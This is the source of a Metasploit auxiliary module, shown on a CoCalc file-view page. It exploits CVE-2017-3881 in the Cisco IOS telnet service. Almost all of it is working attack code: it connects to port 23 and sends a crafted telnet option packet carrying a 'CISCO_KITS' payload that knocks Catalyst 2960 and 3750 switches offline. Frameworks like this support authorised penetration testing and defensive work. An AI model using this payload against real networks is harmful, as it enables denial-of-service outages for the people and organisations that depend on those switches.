CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/dos/cisco/ios_telnet_rocem.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(update_info(info,11'Name' => 'Cisco IOS Telnet Denial of Service',12'Description' => %q{13This module triggers a Denial of Service condition in the Cisco IOS14telnet service affecting multiple Cisco switches. Tested against Cisco15Catalyst 2960 and 3750.16},17'Author' => [ 'Artem Kondratenko' ],18'License' => MSF_LICENSE,19'References' =>20[21['BID', '96960'],22['CVE', '2017-3881'],23['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp'],24['URL', 'https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution']25],26'DisclosureDate' => '2017-03-17'))2728register_options([ Opt::RPORT(23) ])29end3031def run32begin33connect34print_status "Connected to telnet service"35packet = sock.read(200)36if packet.nil?37print_error "Failed to get initial packet from telnet service."38else39print_status "Got initial packet from telnet service: " + packet.inspect40end41print_status "Sending Telnet DoS packet"42sock.put("\xff\xfa\x24\x00\x03CISCO_KITS\x012:" + Rex::Text.rand_text_alpha(1000) + ":1:\xff\xf0")43disconnect44rescue ::Rex::ConnectionRefused45print_status "Unable to connect to #{rhost}:#{rport}."46rescue ::Errno::ECONNRESET47print_good "DoS packet successful. #{rhost} not responding."48end49end50end515253